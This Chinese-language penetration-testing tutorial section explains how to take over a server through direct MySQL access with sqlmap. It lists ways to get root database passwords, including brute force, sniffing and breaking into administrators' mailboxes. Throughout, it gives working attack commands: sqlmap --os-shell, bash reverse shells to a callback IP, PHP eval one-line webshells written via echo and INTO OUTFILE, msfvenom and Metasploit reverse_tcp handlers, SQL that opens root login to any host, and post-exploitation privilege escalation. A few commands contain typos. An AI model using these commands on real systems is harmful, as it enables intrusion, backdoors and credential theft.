4.3 使用sqlmap直连MySQL获取webshell

4.3 使用sqlmap直连MySQL获取webshell

在一些场景下，需要通过MySQL直接连接来获取权限，如果通过暴力破解，嗅探等方法获取了账户和密码，而服务器没开放Web服务的情况，那么就得直接通过数据库获取一定的权限了

4.3.1 使用场景

(1) 获取了MySQL数据库账户和密码

(2) 可以访问3306端口及数据库

4.3.2 扫描获取root账户的密码

通常有下面一些方法来获取root账户的密码

(1) phpMyAdmin 多线程批量破解工具，可以通过收集phpMyAdmin地址进行暴力破解

(2) 代码泄露获取数据库账户和密码

(3) 文件包含读取配置文件中的数据库账户和密码

(4) 通过网络嗅探获取

(5) 渗透运维人员的邮箱及个人主机获取

4.3.3 获取shell

1. 通过sqlmap连接MySQL获取shell

(1) 直接连接数据库

sqlmap.py -d "mysql://root:123456@127.0.0.1:3306/mysql" --os-shell

(2) 通过选择32位或者64位操作系统webshell，执行

bash -i >& /dev/tcp/10.12.22.33/8899 0>&1

(3) 反弹到服务器10.12.22.33 实际的环境中就是自己的独立公网IP地址

(4) 通过echo命令生成shell

echo "<?php @eval($_POST['bmfx']);?>" > /var/www/html/data/phpmyadmin/bmfx.php

如果可以通过phpmyadmin管理数据库，就可以修改host为"%" 并执行权限更新操作，具体如下：

use mysql;

update user set host = '%' where user = 'root';

flush privileges;

注意：如果数据库中有都个host连接，修改时可能会导致数据库连接出问题

1. 通过MSF反弹获取shell

(1) 使用msfvenom生成MSF反弹的PHP脚本木马，默认端口4444

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.12.22.33 -f raw > bmfx.php

(2) 在独立IP或者反弹服务器上运行MSF依次执行一下命令

msfconsole

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set LHOST 10.12.22.33 //这个IP地址就是自己的独立服务器IP地址，

show options

run 0 或者 exploit

(3) 上传并执行PHP文件

将上面生成的bmfx.php文件上传至目标站点，然后访问，如果没有问题的话，那么MSF会显示成功反弹shell

1. 通过PHPMyAdmin管理解码查询生成webshell

select '<?php @eval($_POST[bmfx]);?>' INTO OUTFILE 'F:/phpstudy/www/bmfx.php'

4.3.4 实例演示

1. 直接连接MySQL数据库

sqlmap.py -d "mysql:/root:123456@xxx.xx.xx.xx:3306/mysql" --os-shell

如果上述成功了， 会让你选中服务器架构是32位还是64位

1. 上传UDF文件

在上述操作选择系统架构之后，sqlmap会自动上传UDF文件到服务器提权位置，记住，不管获取的shell是否成功都会显示os-shell提示符

1. 执行命令

cat /etc/passwd

如果是真的成功获取了shell，那么执行的结果就是我们想要的信息

1. 获取反弹shell

虽然通过sqlmap获取了shell，但实际操作的话着实不方便，需要使用独立的服务器进行反弹shell

nc -lvnp 9988

在sqlmap的shell执行

bash -i >& /dev/tcp/10.12.22.33:9988 0>&1

1. 在服务器上生成webshell

上述操作如果没有任何问题，那么就可以找到真实路径直接生成webshell，可以在获取的反弹shell中执行locate *.php找到网站的真实路径，然后在该路径下通过echo命令生成webshell，具体如下：

echo "<?php @eval($_POST['bmfx]);?>" > bmfx.php

1. 获取webshell

上面在服务器上生成的webshell是一句话，可以通过中国菜刀连接此一句话，进行获取webshell

1. 通过phpMyAdmin生成一句话后门

select '<?php @eval($_POST[bmfx]);?>' INTO OUTFILE '/var/www/phpmyadmin/bmfx.php'

1. 通过MSF反弹获取shell

1. MSF提权参考

通过MSF反弹shell，执行background将Session放在后台运行，然后搜索可以利用的exploit来进行测试，具体命令如下：

background

search "关键字" //这里是跟漏洞相关的关键字，比如search tomcat 等等

use exploit/linux

show options

set session 1

exploit

sessions -i 1

getuid